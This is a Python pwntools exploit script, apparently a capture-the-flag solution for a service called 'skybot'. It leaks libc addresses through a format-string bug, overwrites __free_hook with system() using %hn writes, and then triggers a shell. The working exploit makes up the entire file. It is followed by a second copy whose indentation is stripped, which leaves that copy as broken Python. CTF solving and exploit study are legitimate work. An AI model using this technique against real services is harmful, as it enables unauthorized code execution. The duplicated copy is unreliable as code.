bkth/skybot_exploit.py

## skybot_exploit.py
#!/usr/bin/python

from pwn import *
import time


def recv_menu():
    return s.recvuntil('>>> ')


def leak():
    global libc
    global binary
    global target
    global system
    log.info('leaking stuff')
    s.sendline('auth brun\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
    recv_menu()
    s.sendline('send')
    s.recvuntil('To: ')
    s.send('BBBB')
    s.recvuntil('From: ')
    s.send('CCCC')
    s.recvuntil('Subject: ')
    s.send('%p-'*17)
    s.recv(1024)
    leak = s.recv(1024).split('-')
    log.info('got libc pointer 0x%08x' % int(leak[1], 16))
    libc = int(leak[1], 16) - 0x3c5780
    log.info('libc base at %08x' % libc)
    target = libc + 0x3c57a8
    log.info('target (__free_hook) at 0x%08x' % target)
    system = libc + 0x45390


def write_free_hook():
    log.info('overwriting __free_hook with system at 0x%08x' % system)
    system_01 = int(hex(system)[-4:], 16)
    system_23 = int(hex(system)[-8:-4], 16)
    system_45 = int(hex(system)[-12:-8], 16)
    s.sendline('send')
    s.recvuntil('To: ')
    s.send(p64(target) + p64(target + 2) + p64(target + 4) + p64(target + 6))
    s.recvuntil('From: ')
    s.send('B'*8)
    s.recvuntil('Subject: ')
    second = 0x10000 + system_23 - system_01 if system_23 - system_01 < 0 else system_23 - system_01
    s.sendline('%' + str(system_01) + 'x%10$hn' + '%' + str(second) + 'x%11$hn' + '%' + str(0x10000 + system_45 - (second + system_01)) + 'x%12$hn\x00')
    recv_menu()

s = None

while 1:
    try:
        s = remote('127.0.0.1', 4444)
        #s = remote('skybot.insomni.hack', 1337)
        recv_menu()
        leak()
        write_free_hook()
        # at this point __free_hook has been overwritten with the address of system, let's force the program into calling free on our buffer which contains sh
        s.sendline('auth sh')
        recv_menu()
        s.sendline('reset')
        log.info('pwned, enjoy your shell!')
        s.interactive()
        break
    except:
        log.info('exploit failed, retrying')
	#!/usr/bin/python

	from pwn import *
	import time


	def recv_menu():
	return s.recvuntil('>>> ')


	def leak():
	global libc
	global binary
	global target
	global system
	log.info('leaking stuff')
	s.sendline('auth brun\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA')
	recv_menu()
	s.sendline('send')
	s.recvuntil('To: ')
	s.send('BBBB')
	s.recvuntil('From: ')
	s.send('CCCC')
	s.recvuntil('Subject: ')
	s.send('%p-'*17)
	s.recv(1024)
	leak = s.recv(1024).split('-')
	log.info('got libc pointer 0x%08x' % int(leak[1], 16))
	libc = int(leak[1], 16) - 0x3c5780
	log.info('libc base at %08x' % libc)
	target = libc + 0x3c57a8
	log.info('target (__free_hook) at 0x%08x' % target)
	system = libc + 0x45390


	def write_free_hook():
	log.info('overwriting __free_hook with system at 0x%08x' % system)
	system_01 = int(hex(system)[-4:], 16)
	system_23 = int(hex(system)[-8:-4], 16)
	system_45 = int(hex(system)[-12:-8], 16)
	s.sendline('send')
	s.recvuntil('To: ')
	s.send(p64(target) + p64(target + 2) + p64(target + 4) + p64(target + 6))
	s.recvuntil('From: ')
	s.send('B'*8)
	s.recvuntil('Subject: ')
	second = 0x10000 + system_23 - system_01 if system_23 - system_01 < 0 else system_23 - system_01
	s.sendline('%' + str(system_01) + 'x%10$hn' + '%' + str(second) + 'x%11$hn' + '%' + str(0x10000 + system_45 - (second + system_01)) + 'x%12$hn\x00')
	recv_menu()

	s = None

	while 1:
	try:
	s = remote('127.0.0.1', 4444)
	#s = remote('skybot.insomni.hack', 1337)
	recv_menu()
	leak()
	write_free_hook()
	# at this point __free_hook has been overwritten with the address of system, let's force the program into calling free on our buffer which contains sh
	s.sendline('auth sh')
	recv_menu()
	s.sendline('reset')
	log.info('pwned, enjoy your shell!')
	s.interactive()
	break
	except:
	log.info('exploit failed, retrying')